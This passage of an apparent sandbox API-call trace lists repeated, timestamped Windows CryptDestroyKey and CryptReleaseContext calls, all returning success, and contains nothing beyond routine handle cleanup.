returned 1 [0053.147] CryptDestroyKey (hKey=0x360ee0) returned 1 [0053.147] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0053.147] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.634] CryptDestroyKey (hKey=0x360a20) returned 1 [0054.634] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.634] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.634] CryptDestroyKey (hKey=0x360de0) returned 1 [0054.634] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.634] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.635] CryptDestroyKey (hKey=0x360ae0) returned 1 [0054.635] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.635] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.865] CryptDestroyKey (hKey=0x360f20) returned 1 [0054.865] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.865] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.865] CryptDestroyKey (hKey=0x360f60) returned 1 [0054.865] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.865] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.866] CryptDestroyKey (hKey=0x360ee0) returned 1 [0054.866] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.866] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.997] CryptDestroyKey (hKey=0x360a20) returned 1 [0054.997] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.997] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.998] CryptDestroyKey (hKey=0x360d20) returned 1 [0054.998] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.998] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.998] CryptDestroyKey (hKey=0x360ae0) returned 1 [0054.998] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.998] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.258] CryptDestroyKey (hKey=0x360de0) returned 1 [0055.258] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.259] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.390] CryptDestroyKey (hKey=0x360c20) returned 1 [0055.390] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.390] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.390] CryptDestroyKey (hKey=0x360e20) returned 1 [0055.390] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.390] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.391] CryptDestroyKey (hKey=0x360ce0) returned 1 [0055.391] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.391] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.520] CryptDestroyKey (hKey=0x360c20) returned 1 [0055.520] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.520] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.520] CryptDestroyKey (hKey=0x360ce0) returned 1 [0055.520] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.521] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.521] CryptDestroyKey (hKey=0x360de0) returned 1 [0055.521] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.521] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.636] CryptDestroyKey (hKey=0x3609e0) returned 1 [0055.636] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.636] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.637] CryptDestroyKey (hKey=0x360d20) returned 1 [0055.637] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.637] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.745] CryptDestroyKey (hKey=0x360da0) returned 1 [0055.745] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.745] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.745] CryptDestroyKey (hKey=0x360f60) returned 1 [0055.745] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.745] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.746] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.746] CryptDestroyKey (hKey=0x360e20) returned 1 [0055.746] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.956] CryptDestroyKey (hKey=0x360ea0) returned 1 [0055.956] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.956] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.956] CryptDestroyKey (hKey=0x360d20) returned 1 [0055.956] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.956] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.045] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.045] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.045] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.045] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.045] CryptDestroyKey (hKey=0x360e20) returned 1 [0056.046] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.046] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.046] CryptDestroyKey (hKey=0x360f60) returned 1 [0056.046] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.174] CryptDestroyKey (hKey=0x360fa0) returned 1 [0056.174] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.174] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.175] CryptDestroyKey (hKey=0x360f60) returned 1 [0056.175] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.175] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.256] CryptDestroyKey (hKey=0x360d20) returned 1 [0056.256] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.256] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.257] CryptDestroyKey (hKey=0x360ce0) returned 1 [0056.257] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.257] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.343] CryptDestroyKey (hKey=0x360e20) returned 1 [0056.343] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.343] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.343] CryptDestroyKey (hKey=0x360c20) returned 1 [0056.343] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.343] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.344] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.344] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.344] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.454] CryptDestroyKey (hKey=0x360b60) returned 1 [0056.454] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.454] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.455] CryptDestroyKey (hKey=0x360aa0) returned 1 [0056.455] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.455] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.579] CryptDestroyKey (hKey=0x360ce0) returned 1 [0056.579] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.579] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.579] CryptDestroyKey (hKey=0x360ee0) returned 1 [0056.579] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.579] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.580] CryptDestroyKey (hKey=0x360d20) returned 1 [0056.580] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.580] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.679] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.679] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.679] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.680] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.680] CryptDestroyKey (hKey=0x360fa0) returned 1 [0056.680] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.776] CryptDestroyKey (hKey=0x360f60) returned 1 [0056.776] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.776] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.776] CryptDestroyKey (hKey=0x360ee0) returned 1 [0056.776] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.776] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.895] CryptDestroyKey (hKey=0x360fa0) returned 1 [0056.895] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.895] CryptDestroyKey (hKey=0x360b60) returned 1 [0056.895] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.895] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.896] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.896] CryptDestroyKey (hKey=0x360ae0) returned 1 [0056.896] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0056.896] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0056.980] CryptDestroyKey (hKey=0x360ae0) returned 1 [0056.980] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0056.980] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0056.980] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.980] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.980] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0057.161] CryptDestroyKey (hKey=0x360f20) returned 1 [0057.161] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0057.161] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0057.162] CryptDestroyKey (hKey=0x360fa0) returned 1 [0057.162] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.162] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.162] CryptDestroyKey (hKey=0x360d20) returned 1 [0057.162] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.162] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.257] CryptDestroyKey (hKey=0x360e20) returned 1 [0057.257] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0057.257] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0057.257] CryptDestroyKey (hKey=0x360fa0) returned 1 [0057.257] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.257] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.258] CryptDestroyKey (hKey=0x360f20) returned 1 [0057.258] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.258] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.370] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.370] CryptDestroyKey (hKey=0x360fa0) returned 1 [0057.370] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.371] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.371] CryptDestroyKey (hKey=0x360da0) returned 1 [0057.371] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.371] CryptDestroyKey (hKey=0x360f20) returned 1 [0057.371] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.371] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.479] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.479] CryptDestroyKey (hKey=0x360de0) returned 1 [0057.479] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.480] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.480] CryptDestroyKey (hKey=0x360d20) returned 1 [0057.480] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.556] CryptDestroyKey (hKey=0x360b20) returned 1 [0057.556] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.557] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.557] CryptDestroyKey (hKey=0x360da0) returned 1 [0057.557] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.557] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.668] CryptDestroyKey (hKey=0x360f20) returned 1 [0057.668] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.668] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.669] CryptDestroyKey (hKey=0x360b20) returned 1 [0057.669] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.669] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.764] CryptDestroyKey (hKey=0x360f20) returned 1 [0057.764] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.764] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.765] CryptDestroyKey (hKey=0x360b20) returned 1 [0057.765] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.765] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.765] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.765] CryptDestroyKey (hKey=0x360ae0) returned 1 [0057.765] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.876] CryptDestroyKey (hKey=0x360d20) returned 1 [0057.876] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.876] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.876] CryptDestroyKey (hKey=0x360ee0) returned 1 [0057.876] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.876] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.975] CryptDestroyKey (hKey=0x3609e0) returned 1 [0057.975] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.975] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.976] CryptDestroyKey (hKey=0x360b20) returned 1 [0057.976] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.976] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.133] CryptDestroyKey (hKey=0x360f60) returned 1 [0058.133] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.133] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.134] CryptDestroyKey (hKey=0x360fa0) returned 1 [0058.134] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.134] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.134] CryptDestroyKey (hKey=0x360e20) returned 1 [0058.134] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.134] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.235] CryptDestroyKey (hKey=0x360aa0) returned 1 [0058.236] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.236] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.236] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.236] CryptDestroyKey (hKey=0x360ea0) returned 1 [0058.236] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.362] CryptDestroyKey (hKey=0x360ae0) returned 1 [0058.362] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.362] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.362] CryptDestroyKey (hKey=0x360ee0) returned 1 [0058.362] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.363] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.447] CryptDestroyKey (hKey=0x360ea0) returned 1 [0058.447] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.447] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.448] CryptDestroyKey (hKey=0x360c20) returned 1 [0058.448] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.448] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.448] CryptDestroyKey (hKey=0x360ce0) returned 1 [0058.448] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.448] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.578] CryptDestroyKey (hKey=0x360ce0) returned 1 [0058.578] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.578] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.579] CryptDestroyKey (hKey=0x3609e0) returned 1 [0058.579] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.579] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.689] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.689] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.690] CryptDestroyKey (hKey=0x360b20) returned 1 [0058.690] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.690] CryptDestroyKey (hKey=0x360de0) returned 1 [0058.690] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.691] CryptDestroyKey (hKey=0x360a20) returned 1 [0058.691] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.691] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.802] CryptDestroyKey (hKey=0x360ae0) returned 1 [0058.802] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.802] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.803] CryptDestroyKey (hKey=0x360a20) returned 1 [0058.803] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.803] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.879] CryptDestroyKey (hKey=0x360de0) returned 1 [0058.879] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.880] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.880] CryptDestroyKey (hKey=0x360b20) returned 1 [0058.880] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.880] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.984] CryptDestroyKey (hKey=0x360de0) returned 1 [0058.984] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.984] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.985] CryptDestroyKey (hKey=0x360b20) returned 1 [0058.985] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.985] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.066] CryptDestroyKey (hKey=0x360f60) returned 1 [0059.066] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.066] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.067] CryptDestroyKey (hKey=0x360b60) returned 1 [0059.067] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.067] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.190] CryptDestroyKey (hKey=0x360a20) returned 1 [0059.190] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0059.190] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0059.191] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.191] CryptDestroyKey (hKey=0x360ce0) returned 1 [0059.191] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.191] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.192] CryptDestroyKey (hKey=0x360e20) returned 1 [0059.192] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.192] CryptDestroyKey (hKey=0x360c20) returned 1 [0059.192] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.192] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.311] CryptDestroyKey (hKey=0x360e20) returned 1 [0059.311] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.311] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.311] CryptDestroyKey (hKey=0x360d20) returned 1 [0059.311] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.311] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.489] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.490] CryptDestroyKey (hKey=0x360b20) returned 1 [0059.490] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.490] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.490] CryptDestroyKey (hKey=0x360aa0) returned 1 [0059.490] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.610] CryptDestroyKey (hKey=0x360aa0) returned 1 [0059.610] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.610] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.699] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.700] CryptDestroyKey (hKey=0x360b20) returned 1 [0059.700] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.812] CryptDestroyKey (hKey=0x360aa0) returned 1 [0059.812] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.812] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.813] CryptDestroyKey (hKey=0x360b20) returned 1 [0059.813] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.813] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.896] CryptDestroyKey (hKey=0x360f20) returned 1 [0059.896] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.896] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.896] CryptDestroyKey (hKey=0x360da0) returned 1 [0059.896] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.896] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.001] CryptDestroyKey (hKey=0x360fa0) returned 1 [0060.001] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.001] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.002] CryptDestroyKey (hKey=0x360e20) returned 1 [0060.002] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.002] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.080] CryptDestroyKey (hKey=0x360e20) returned 1 [0060.080] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.080] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.081] CryptDestroyKey (hKey=0x360fa0) returned 1 [0060.081] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.081] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.181] CryptDestroyKey (hKey=0x360ea0) returned 1 [0060.181] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.182] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.182] CryptDestroyKey (hKey=0x360ae0) returned 1 [0060.182] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.182] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.266] CryptDestroyKey (hKey=0x360ea0) returned 1 [0060.266] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.267] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.267] CryptDestroyKey (hKey=0x360ae0) returned 1 [0060.267] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.267] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.353] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.353] CryptDestroyKey (hKey=0x360f60) returned 1 [0060.353] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.353] CryptDestroyKey (hKey=0x360ee0) returned 1 [0060.353] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.354] CryptDestroyKey (hKey=0x360fa0) returned 1 [0060.354] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.354] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.354] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.480] CryptDestroyKey (hKey=0x360ce0) returned 1 [0060.480] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.480] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.480] CryptDestroyKey (hKey=0x360aa0) returned 1 [0060.480] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.480] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.574] CryptDestroyKey (hKey=0x360da0) returned 1 [0060.574] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.575] CryptDestroyKey (hKey=0x360f20) returned 1 [0060.575] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.575] CryptDestroyKey (hKey=0x360e60) returned 1 [0060.575] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.575] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.575] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.575] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.660] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.661] CryptDestroyKey (hKey=0x360d60) returned 1 [0060.661] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.661] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.661] CryptDestroyKey (hKey=0x360f20) returned 1 [0060.661] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.771] CryptDestroyKey (hKey=0x360f20) returned 1 [0060.771] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.771] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.772] CryptDestroyKey (hKey=0x360d60) returned 1 [0060.772] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.772] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.852] CryptDestroyKey (hKey=0x360f20) returned 1 [0060.852] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.853] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.853] CryptDestroyKey (hKey=0x360b60) returned 1 [0060.853] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.853] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.940] CryptDestroyKey (hKey=0x360b60) returned 1 [0060.940] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.940] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.941] CryptDestroyKey (hKey=0x360f20) returned 1 [0060.941] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.941] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.021] CryptDestroyKey (hKey=0x360fa0) returned 1 [0061.021] CryptReleaseContext 